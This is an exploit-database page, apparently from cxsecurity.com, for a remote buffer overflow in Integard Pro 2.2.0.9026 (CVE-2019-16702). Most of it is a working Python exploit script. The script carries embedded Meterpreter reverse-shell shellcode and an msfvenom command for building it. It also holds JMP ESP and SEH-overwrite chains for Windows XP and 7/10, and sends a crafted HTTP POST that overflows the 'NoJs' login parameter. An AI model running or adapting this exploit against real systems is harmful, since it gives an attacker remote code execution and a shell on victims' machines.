Integard Pro NoJs 2.2.0.9026 Remote Buffer Overflow

2019.12.11
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Date: 2019-09-22 Exploit Author: purpl3f0xsecur1ty Vendor Homepage: https://www.tucows.com/ Software Link: http://www.tucows.com/preview/519612/Integard-Home Version: Pro 2.2.0.9026 / Home 2.0.0.9021 Tested on: Windows XP / Win7 / Win10 CVE: CVE-2019-16702 #!/usr/bin/python ######################################################## #~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~# #~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# # The vulnerability: Integard fails to sanitize input # # to the "NoJs" parameter in an HTTP POST request, # # resulting in a stack buffer overflow that overwrites # # the instruction pointer, leading to remote code # # execution. # ######################################################## import socket import os import sys from struct import pack def main(): print "~*Integard RCE Exploit for XP/7/10*~" print "Chose target: (Enter number only)" print "1) - Windows XP" print "2) - Windows 7/10" target = str(input()) host = "10.0.0.130" port = 18881 #################################################### # Integard's functionality interferes with reverse # # and bind shells. Only Meterpreter seems to work. # #################################################### # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread meterpreter = "\x90" * 50 meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4" meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15" meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80" meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e" meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a" meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84" meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27" meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66" meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44" meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86" meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc" meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43" meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06" meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc" meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f" meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab" meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b" meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02" meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85" meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca" meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04" meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56" meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda" meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa" meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94" meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37" meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88" meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80" meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe" meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84" meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f" meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea" meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b" meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d" meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36" meterpreter += "\xf9\x7e\x89\x13" if target == "1": print "[*] Sending Windows XP payload using meterpreter/reverse_tcp" # JMP ESP at 0x3E087557 in iertutil.dll crash = "A" * 512 crash += pack("<L",0x3E087557) crash += meterpreter crash += "C" * (1500 - len(crash)) buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" if target == "2": print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp" # ASLR IS ON!!! MUST USE NON-ASLR MODULE! # POP POP RET in integard.exe (ASLR disabled) nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards SEH = pack("<L",0x004042B0) jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) crash += meterpreter crash += "\x90" * 50 crash += jumpCall crash += bigBackJump crash += nSEH crash += SEH buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done" main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top